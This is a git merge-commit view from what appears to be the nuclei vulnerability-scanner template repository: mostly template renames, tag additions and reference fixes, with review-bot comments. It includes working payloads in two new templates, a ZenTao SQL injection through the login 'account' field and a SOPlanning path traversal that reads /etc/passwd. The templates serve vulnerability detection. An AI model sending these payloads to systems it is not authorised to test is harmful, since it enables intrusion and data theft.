Merge branch 'master' into patch-1

patch-1
Prince Chaddha 2022-09-12 16:56:13 +05:30 committed by GitHub
commit 86d7f1b84a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
520 changed files with 7600 additions and 4986 deletions

View File

@ -1,25 +1,33 @@
cves/2017/CVE-2017-11586.yaml
cves/2017/CVE-2017-11629.yaml
cves/2019/CVE-2019-14530.yaml
cves/2020/CVE-2020-17526.yaml
cves/2020/CVE-2020-5191.yaml
cves/2020/CVE-2020-5192.yaml
cves/2022/CVE-2022-2383.yaml
cves/2022/CVE-2022-32770.yaml
cves/2022/CVE-2022-32771.yaml
cves/2022/CVE-2022-32772.yaml
cves/2022/CVE-2022-34576.yaml
exposed-panels/adobe/aem-crx-package-manager.yaml
exposed-panels/adobe/aem-sling-login.yaml
exposed-panels/icc-pro-login.yaml
misconfiguration/aem/aem-crx-browser.yaml
misconfiguration/aem/aem-crx-namespace.yaml
misconfiguration/aem/aem-crx-search.yaml
misconfiguration/aem/aem-disk-usage.yaml
misconfiguration/aem/aem-explorer-nodetypes.yaml
misconfiguration/aem/aem-external-link-checker.yaml
misconfiguration/aem/aem-misc-admin.yaml
misconfiguration/aem/aem-offloading-browser.yaml
misconfiguration/aem/aem-security-users.yaml
misconfiguration/aem/aem-sling-userinfo.yaml
takeovers/uservoice-takeover.yaml
cnvd/2022/CNVD-2022-42853.yaml
cves/2014/CVE-2014-8676.yaml
cves/2015/CVE-2015-7245.yaml
cves/2018/CVE-2018-16139.yaml
cves/2020/CVE-2020-13258.yaml
cves/2021/CVE-2021-35380.yaml
cves/2021/CVE-2021-42663.yaml
cves/2021/CVE-2021-42667.yaml
cves/2022/CVE-2022-2376.yaml
cves/2022/CVE-2022-23854.yaml
cves/2022/CVE-2022-29004.yaml
cves/2022/CVE-2022-29005.yaml
cves/2022/CVE-2022-31474.yaml
cves/2022/CVE-2022-35405.yaml
cves/2022/CVE-2022-36642.yaml
cves/2022/CVE-2022-37299.yaml
default-logins/3com/3com-nj2000-default-login.yaml
exposed-panels/appsmith-web-login.yaml
exposed-panels/corebos-panel.yaml
exposed-panels/cvent-panel-detect.yaml
exposed-panels/omniampx-panel.yaml
exposed-panels/v2924-admin-panel.yaml
exposures/logs/redis-exception-error.yaml
exposures/logs/webalizer-xtended-stats.yaml
misconfiguration/aws-xray-application.yaml
misconfiguration/corebos-htaccess.yaml
misconfiguration/ec2-instance-information.yaml
misconfiguration/graphql/graphql-playground.yaml
misconfiguration/hivequeue-agent.yaml
misconfiguration/server-status.yaml
technologies/jhipster-detect.yaml
technologies/openssl-detect.yaml
vulnerabilities/videoxpert-lfi.yaml

View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1388 | daffainfo | 630 | cves | 1363 | info | 1450 | http | 3773 |
| panel | 642 | dhiyaneshdk | 558 | exposed-panels | 649 | high | 974 | file | 76 |
| edb | 548 | pikpikcu | 326 | vulnerabilities | 510 | medium | 811 | network | 51 |
| lfi | 496 | pdteam | 269 | technologies | 278 | critical | 469 | dns | 17 |
| xss | 472 | geeknik | 187 | exposures | 273 | low | 219 | | |
| wordpress | 415 | dwisiswant0 | 169 | token-spray | 230 | unknown | 7 | | |
| exposure | 394 | 0x_akoko | 158 | misconfiguration | 217 | | | | |
| cve2021 | 343 | princechaddha | 150 | workflows | 189 | | | | |
| rce | 335 | pussycat0x | 133 | default-logins | 102 | | | | |
| wp-plugin | 312 | ritikchaddha | 130 | file | 76 | | | | |
| cve | 1414 | daffainfo | 630 | cves | 1389 | info | 1463 | http | 3823 |
| panel | 649 | dhiyaneshdk | 577 | exposed-panels | 656 | high | 1000 | file | 76 |
| edb | 557 | pikpikcu | 326 | vulnerabilities | 510 | medium | 811 | network | 51 |
| lfi | 500 | pdteam | 269 | technologies | 280 | critical | 475 | dns | 17 |
| xss | 486 | geeknik | 187 | exposures | 273 | low | 221 | | |
| wordpress | 417 | dwisiswant0 | 169 | misconfiguration | 231 | unknown | 10 | | |
| exposure | 404 | 0x_akoko | 162 | token-spray | 230 | | | | |
| cve2021 | 350 | princechaddha | 150 | workflows | 189 | | | | |
| rce | 335 | ritikchaddha | 135 | default-logins | 102 | | | | |
| wp-plugin | 314 | pussycat0x | 133 | file | 76 | | | | |
**294 directories, 4145 files**.
**295 directories, 4195 files**.
</td>
</tr>

File diff suppressed because one or more lines are too long

File diff suppressed because it is too large

View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1388 | daffainfo | 630 | cves | 1363 | info | 1450 | http | 3773 |
| panel | 642 | dhiyaneshdk | 558 | exposed-panels | 649 | high | 974 | file | 76 |
| edb | 548 | pikpikcu | 326 | vulnerabilities | 510 | medium | 811 | network | 51 |
| lfi | 496 | pdteam | 269 | technologies | 278 | critical | 469 | dns | 17 |
| xss | 472 | geeknik | 187 | exposures | 273 | low | 219 | | |
| wordpress | 415 | dwisiswant0 | 169 | token-spray | 230 | unknown | 7 | | |
| exposure | 394 | 0x_akoko | 158 | misconfiguration | 217 | | | | |
| cve2021 | 343 | princechaddha | 150 | workflows | 189 | | | | |
| rce | 335 | pussycat0x | 133 | default-logins | 102 | | | | |
| wp-plugin | 312 | ritikchaddha | 130 | file | 76 | | | | |
| cve | 1414 | daffainfo | 630 | cves | 1389 | info | 1463 | http | 3823 |
| panel | 649 | dhiyaneshdk | 577 | exposed-panels | 656 | high | 1000 | file | 76 |
| edb | 557 | pikpikcu | 326 | vulnerabilities | 510 | medium | 811 | network | 51 |
| lfi | 500 | pdteam | 269 | technologies | 280 | critical | 475 | dns | 17 |
| xss | 486 | geeknik | 187 | exposures | 273 | low | 221 | | |
| wordpress | 417 | dwisiswant0 | 169 | misconfiguration | 231 | unknown | 10 | | |
| exposure | 404 | 0x_akoko | 162 | token-spray | 230 | | | | |
| cve2021 | 350 | princechaddha | 150 | workflows | 189 | | | | |
| rce | 335 | ritikchaddha | 135 | default-logins | 102 | | | | |
| wp-plugin | 314 | pussycat0x | 133 | file | 76 | | | | |

View File

@ -13,7 +13,7 @@ info:
cvss-score: 9.9
cwe-id: CWE-434
remediation: Pan Wei has released an update to resolve this vulnerability.
tags: pan,micro,cnvd,cnvd2021
tags: pan,micro,cnvd,cnvd2021,fileupload,intrusive
requests:
- raw:

View File

@ -0,0 +1,35 @@
id: CNVD-2022-42853
info:
name: ZenTao CMS - SQL Injection
author: ling
severity: high
description: |
Zen Tao has a SQL injection vulnerability. Attackers can exploit the vulnerability to obtain sensitive database information.
reference:
- https://github.com/z92g/ZentaoSqli/blob/master/CNVD-2022-42853.go
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-42853
metadata:
verified: true
shodan-query: http.title:"zentao"
fofa-query: "Zentao"
tags: cnvd,cnvd2022,zentao,sqli
variables:
num: "999999999"
requests:
- raw:
- |
POST /zentao/user-login.html HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: {{BaseURL}}/zentao/user-login.html
account=admin'+and++updatexml(1,concat(0x1,md5({{num}})),1)+and+'1'='1
matchers:
- type: word
part: body
words:
- 'c8c605999f3d8352d7bb792cf3fdb25'
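Review bot: the matcher word `c8c605999f3d8352d7bb792cf3fdb25` is 31 hex characters, one short of a full MD5 digest, and nothing in the template says why. If the truncation is deliberate (for example, the `updatexml` error text cutting the value off after the `0x1` prefix), add a comment above the matcher saying so; otherwise match the full digest. The hash is also hard-coded while `num` is a variable, so changing `num: "999999999"` silently breaks detection; either note that coupling next to `variables:` or drop the variable.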

View File

@ -10,7 +10,7 @@ info:
- https://www.exploit-db.com/exploits/5194
- https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
- https://nvd.nist.gov/vuln/detail/CVE-2008-1059
- http://secunia.com/advisories/29099
- https://web.archive.org/web/20090615225856/http://secunia.com/advisories/29099/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5

View File

@ -1,11 +1,11 @@
id: CVE-2008-1061
info:
name: Wordpress Plugin Sniplets 1.2.2 - Cross-Site Scripting
name: WordPress Sniplets <=1.2.2 - Cross-Site Scripting
author: dhiyaneshDK
severity: medium
description: |
Multiple cross-site scripting (XSS) vulnerabilities in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) text parameter to (a) warning.php, (b) notice.php, and (c) inset.php in view/sniplets/, and possibly (d) modules/execute.php; the (2) url parameter to (e) view/admin/submenu.php; and the (3) page parameter to (f) view/admin/pager.php.
WordPress Sniplets 1.1.2 and 1.2.2 plugin contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the text parameter to warning.php, notice.php, and inset.php in view/sniplets/, and possibly modules/execute.php; via the url parameter to view/admin/submenu.php; and via the page parameter to view/admin/pager.php.
reference:
- https://www.exploit-db.com/exploits/5194
- https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
@ -35,3 +35,6 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/08/31

View File

@ -7,8 +7,8 @@ info:
description: A directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI.
reference:
- https://www.exploit-db.com/exploits/35945
- https://www.cvedetails.com/cve/CVE-2011-2744
- http://www.openwall.com/lists/oss-security/2011/07/13/6
- https://nvd.nist.gov/vuln/detail/CVE-2011-2744
- http://web.archive.org/web/20140723162411/http://secunia.com/advisories/45184/
classification:
cve-id: CVE-2011-2744

View File

@ -1,7 +1,7 @@
id: CVE-2011-4618
info:
name: Advanced Text Widget < 2.0.2 - Reflected Cross-Site Scripting
name: Advanced Text Widget < 2.0.2 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.

View File

@ -1,7 +1,7 @@
id: CVE-2011-4624
info:
name: GRAND FlAGallery 1.57 - Reflected Cross-Site Scripting
name: GRAND FlAGallery 1.57 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting (XSS) vulnerability in facebook.php in the GRAND FlAGallery plugin (flash-album-gallery) before 1.57 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter.

View File

@ -7,9 +7,9 @@ info:
description: A directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/36598
- https://www.cvedetails.com/cve/CVE-2011-4804
- http://web.archive.org/web/20140802122115/http://secunia.com/advisories/46844/
- http://web.archive.org/web/20210121214308/https://www.securityfocus.com/bid/48944/
- https://nvd.nist.gov/vuln/detail/CVE-2011-4804
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2011-4804

View File

@ -1,7 +1,7 @@
id: CVE-2011-4926
info:
name: Adminimize 1.7.22 - Reflected Cross-Site Scripting
name: Adminimize 1.7.22 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.

View File

@ -1,7 +1,7 @@
id: CVE-2011-5106
info:
name: WordPress Plugin Flexible Custom Post Type < 0.1.7 - Reflected Cross-Site Scripting
name: WordPress Plugin Flexible Custom Post Type < 0.1.7 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter.

View File

@ -1,7 +1,7 @@
id: CVE-2011-5107
info:
name: Alert Before Your Post <= 0.1.1 - Reflected Cross-Site Scripting
name: Alert Before Your Post <= 0.1.1 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in post_alert.php in Alert Before Your Post plugin, possibly 0.1.1 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter.

View File

@ -1,7 +1,7 @@
id: CVE-2011-5179
info:
name: Skysa App Bar 1.04 - Reflected Cross-Site Scripting
name: Skysa App Bar 1.04 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.

View File

@ -1,7 +1,7 @@
id: CVE-2011-5181
info:
name: ClickDesk Live Support Live Chat 2.0 - Reflected Cross-Site Scripting
name: ClickDesk Live Support Live Chat 2.0 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter.

View File

@ -1,7 +1,7 @@
id: CVE-2011-5265
info:
name: Featurific For WordPress 1.6.2 - Reflected Cross-Site Scripting
name: Featurific For WordPress 1.6.2 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter.

View File

@ -7,9 +7,9 @@ info:
description: An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter.
reference:
- https://packetstormsecurity.com/files/108631/
- https://www.cvedetails.com/cve/CVE-2012-0896
- http://web.archive.org/web/20140804110141/http://secunia.com/advisories/47529/
- http://plugins.trac.wordpress.org/changeset/488883/count-per-day
- https://https://nvd.nist.gov/vuln/detail/CVE-2012-0896
classification:
cve-id: CVE-2012-0896
metadata:
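Review bot: the added reference `- https://https://nvd.nist.gov/vuln/detail/CVE-2012-0896` has a doubled scheme and will not resolve. It should read `https://nvd.nist.gov/vuln/detail/CVE-2012-0896`.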

View File

@ -1,7 +1,7 @@
id: CVE-2012-0901
info:
name: YouSayToo auto-publishing 1.0 - Reflected Cross-Site Scripting
name: YouSayToo auto-publishing 1.0 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.

View File

@ -1,7 +1,7 @@
id: CVE-2012-1835
info:
name: WordPress Plugin All-in-One Event Calendar 1.4 - Reflected Cross-Site Scripting
name: WordPress Plugin All-in-One Event Calendar 1.4 - Cross-Site Scripting
author: daffainfo
severity: medium
description: Multiple cross-site scripting vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php.

View File

@ -1,7 +1,7 @@
id: CVE-2012-2371
info:
name: WP-FaceThumb 0.1 - Reflected Cross-Site Scripting
name: WP-FaceThumb 0.1 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in index.php in the WP-FaceThumb plugin 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pagination_wp_facethumb parameter.

View File

@ -1,7 +1,7 @@
id: CVE-2012-4242
info:
name: WordPress Plugin MF Gig Calendar 0.9.2 - Reflected Cross-Site Scripting
name: WordPress Plugin MF Gig Calendar 0.9.2 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page.

View File

@ -1,7 +1,7 @@
id: CVE-2012-4273
info:
name: 2 Click Socialmedia Buttons < 0.34 - Reflected Cross Site Scripting
name: 2 Click Socialmedia Buttons < 0.34 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter.

View File

@ -1,7 +1,7 @@
id: CVE-2012-4768
info:
name: WordPress Plugin Download Monitor < 3.3.5.9 - Reflected Cross-Site Scripting
name: WordPress Plugin Download Monitor < 3.3.5.9 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI.

View File

@ -1,7 +1,7 @@
id: CVE-2012-4889
info:
name: ManageEngine Firewall Analyzer 7.2 - Reflected Cross Site Scripting
name: ManageEngine Firewall Analyzer 7.2 - Cross-Site Scripting
author: daffainfo
severity: medium
description: Multiple cross-site scripting vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do.

View File

@ -1,7 +1,7 @@
id: CVE-2012-5913
info:
name: WordPress Integrator 1.32 - Reflected Cross-Site Scripting
name: WordPress Integrator 1.32 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php.

View File

@ -1,7 +1,7 @@
id: CVE-2013-2287
info:
name: WordPress Plugin Uploader 1.0.4 - Reflected Cross-Site Scripting
name: WordPress Plugin Uploader 1.0.4 - Cross-Site Scripting
author: daffainfo
severity: medium
description: Multiple cross-site scripting vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter.

View File

@ -1,7 +1,7 @@
id: CVE-2013-3526
info:
name: WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting
name: WordPress Plugin Traffic Analyzer - 'aoid' Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter."
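Review bot: the `description:` line ends with a stray double quote (`via the aoid parameter."`) that has no opening partner. Since this file is being touched for the rename anyway, drop the trailing `"` so the text is not emitted with it.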

View File

@ -1,7 +1,7 @@
id: CVE-2013-4117
info:
name: WordPress Plugin Category Grid View Gallery 2.3.1 - Reflected Cross-Site Scripting
name: WordPress Plugin Category Grid View Gallery 2.3.1 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter.

View File

@ -1,7 +1,7 @@
id: CVE-2013-4625
info:
name: WordPress Plugin Duplicator < 0.4.5 - Reflected Cross-Site Scripting
name: WordPress Plugin Duplicator < 0.4.5 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter.

View File

@ -8,7 +8,6 @@ info:
reference:
- https://www.exploit-db.com/exploits/26955
- https://nvd.nist.gov/vuln/detail/CVE-2013-5979
- https://www.cvedetails.com/cve/CVE-2013-5979
- https://bugs.launchpad.net/xibo/+bug/1093967
classification:
cve-id: CVE-2013-5979

View File

@ -18,7 +18,7 @@ info:
cve-id: CVE-2013-6281
cwe-id: CWE-79
metadata:
google-dork: inurl:/wp-content/plugins/dhtmlxspreadsheet
google-query: inurl:/wp-content/plugins/dhtmlxspreadsheet
verified: "true"
tags: wp,wpscan,cve,cve2013,wordpress,xss,wp-plugin
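Review bot: next to the renamed `google-query` key, `verified: "true"` is a quoted string, whereas the CNVD-2022-42853 template added in this same commit uses the boolean `verified: true`. Pick one form so tooling that filters on `verified` does not have to handle both types.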

View File

@ -7,7 +7,6 @@ info:
description: A directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impacts via a .. (dot dot) in the url parameter to photoalbum/index.php.
reference:
- https://www.exploit-db.com/exploits/30865
- https://www.cvedetails.com/cve/CVE-2014-10037
- https://nvd.nist.gov/vuln/detail/CVE-2014-10037
- http://www.exploit-db.com/exploits/30865
classification:
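Review bot: after the `cvedetails.com` entry is removed, the reference list still carries the same Exploit-DB entry twice, once as `https://www.exploit-db.com/exploits/30865` and once as `http://www.exploit-db.com/exploits/30865`. Drop the `http://` duplicate as part of this cleanup.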

View File

@ -1,7 +1,7 @@
id: CVE-2014-4513
info:
name: ActiveHelper LiveHelp Server 3.1.0 - Reflected Cross-Site Scripting
name: ActiveHelper LiveHelp Server 3.1.0 - Cross-Site Scripting
author: daffainfo
severity: medium
description: Multiple cross-site scripting vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter.

View File

@ -1,7 +1,7 @@
id: CVE-2014-4535
info:
name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting
name: Import Legacy Media <= 0.1 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php.
@ -14,7 +14,7 @@ info:
cvss-score: 6.1
cve-id: CVE-2014-4535
cwe-id: CWE-79
tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss
tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth
requests:
- method: GET
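Review bot: the `tags:` line gains `unauth` to preserve the "Unauthenticated" that the rename removed from `name:`, but the "Reflected" qualifier removed in the same rename is not recorded anywhere. If the XSS type matters to users filtering templates, say so in the description or agree on a tag for it; the same applies to the other "Reflected" renames in this commit.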

View File

@ -1,7 +1,7 @@
id: CVE-2014-4536
info:
name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected Cross-Site Scripting
name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Cross-Site Scripting
author: daffainfo
severity: medium
description: Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter.
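Review bot: the new `name:` says `< 1.5.7` while the unchanged `description:` says "before 1.5.6". The rename is a good moment to check which bound is right and make the two lines agree.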
@ -17,7 +17,7 @@ info:
cwe-id: CWE-79
metadata:
google-query: inurl:"/wp-content/plugins/infusionsoft/Infusionsoft/"
tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss
tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth
requests:
- method: GET

View File

@ -1,7 +1,7 @@
id: CVE-2014-4539
info:
name: Movies <= 0.6 - Unauthenticated Reflected Cross-Site Scripting
name: Movies <= 0.6 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in the Movies plugin 0.6 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php.
@ -14,7 +14,7 @@ info:
cvss-score: 6.1
cve-id: CVE-2014-4539
cwe-id: CWE-79
tags: wordpress,wp-plugin,xss,wpscan,cve,cve2014
tags: wordpress,wp-plugin,xss,wpscan,cve,cve2014,unauth
requests:
- method: GET

View File

@ -1,7 +1,7 @@
id: CVE-2014-4544
info:
name: Podcast Channels < 0.28 - Unauthenticated Reflected Cross-Site Scripting
name: Podcast Channels < 0.28 - Cross-Site Scripting
author: daffainfo
severity: medium
description: The Podcast Channels WordPress plugin was affected by an unauthenticated reflected cross-site scripting security vulnerability.
@ -14,7 +14,7 @@ info:
cvss-score: 6.1
cve-id: CVE-2014-4544
cwe-id: CWE-79
tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss
tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth
requests:
- method: GET

View File

@ -1,7 +1,7 @@
id: CVE-2014-4550
info:
name: Shortcode Ninja <= 1.4 - Unauthenticated Reflected Cross-Site Scripting
name: Shortcode Ninja <= 1.4 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in preview-shortcode-external.php in the Shortcode Ninja plugin 1.4 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the shortcode parameter.
@ -16,7 +16,7 @@ info:
cwe-id: CWE-79
metadata:
google-query: inurl:"/wp-content/plugins/shortcode-ninja"
tags: wordpress,wp-plugin,xss,wpscan,cve,cve2014
tags: wordpress,wp-plugin,xss,wpscan,cve,cve2014,unauth
requests:
- method: GET

View File

@ -1,7 +1,7 @@
id: CVE-2014-4558
info:
name: WooCommerce Swipe <= 2.7.1 - Unauthenticated Reflected Cross-Site Scripting
name: WooCommerce Swipe <= 2.7.1 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter.
@ -14,7 +14,7 @@ info:
cvss-score: 6.1
cve-id: CVE-2014-4558
cwe-id: CWE-79
tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,woocommerce
tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,woocommerce,unauth
requests:
- method: GET

View File

@ -1,7 +1,7 @@
id: CVE-2014-4561
info:
name: Ultimate Weather Plugin <= 1.0 - Unauthenticated Reflected Cross-Site Scripting
name: Ultimate Weather Plugin <= 1.0 - Cross-Site Scripting
author: daffainfo
severity: medium
description: The ultimate-weather plugin 1.0 for WordPress contains a cross-site scripting vulnerability.
@ -14,7 +14,7 @@ info:
cvss-score: 6.1
cve-id: CVE-2014-4561
cwe-id: CWE-79
tags: cve,cve2014,wordpress,wp-plugin,xss,weather,wpscan
tags: cve,cve2014,wordpress,wp-plugin,xss,weather,wpscan,unauth
requests:
- method: GET

View File

@ -1,7 +1,7 @@
id: CVE-2014-4592
info:
name: WP Planet <= 0.1 - Unauthenticated Reflected Cross-Site Scripting
name: WP Planet <= 0.1 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter.
@ -16,7 +16,7 @@ info:
cwe-id: CWE-79
metadata:
google-query: inurl:"/wp-content/plugins/wp-planet"
tags: cve2014,wordpress,wp-plugin,xss,wpscan,cve
tags: cve2014,wordpress,wp-plugin,xss,wpscan,cve,unauth
requests:
- method: GET

View File

@ -8,7 +8,6 @@ info:
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-5368
- https://www.exploit-db.com/exploits/39287
- https://www.cvedetails.com/cve/CVE-2014-5368
- http://seclists.org/oss-sec/2014/q3/417
classification:
cve-id: CVE-2014-5368

View File

@ -0,0 +1,34 @@
id: CVE-2014-8676
info:
name: Simple Online Planning Tool 1.3.2 - Directory Traversal
author: 0x_Akoko
severity: medium
description: |
Directory traversal vulnerability in the file_get_contents function in SOPlanning 1.32 and earlier allows remote attackers to determine the existence of arbitrary files via a .. (dot dot) in a URL path parameter.
reference:
- https://packetstormsecurity.com/files/132654/Simple-Online-Planning-Tool-1.3.2-XSS-SQL-Injection-Traversal.html
- https://nvd.nist.gov/vuln/detail/CVE-2014-8676
- https://www.exploit-db.com/exploits/37604/
- http://seclists.org/fulldisclosure/2015/Jul/44
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2014-8676
cwe-id: CWE-22
tags: packetstorm,edb,seclists,cve,cve2014,soplanning,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/process/feries.php?fichier=../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
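Review bot: `name:` gives the version as `1.3.2` while `description:` says "SOPlanning 1.32 and earlier"; one of the two is a typo and they should match. The description also says the flaw lets attackers "determine the existence of arbitrary files", yet the matcher requires `root:[x*]:0:0` in the response, which is file content disclosure; reword the description or explain the difference so the `medium` severity and the `lfi` tag are consistent with what the template actually detects.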

View File

@ -8,7 +8,6 @@ info:
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-8799
- https://www.exploit-db.com/exploits/35346
- https://www.cvedetails.com/cve/CVE-2014-8799
- https://wordpress.org/plugins/dukapress/changelog/
classification:
cve-id: CVE-2014-8799

View File

@ -1,7 +1,7 @@
id: CVE-2014-9094
info:
name: WordPress DZS-VideoGallery Plugin Reflected Cross-Site Scripting
name: WordPress DZS-VideoGallery Plugin Cross-Site Scripting
author: daffainfo
severity: medium
description: Multiple cross-site scripting vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter.

View File

@ -1,7 +1,7 @@
id: CVE-2014-9444
info:
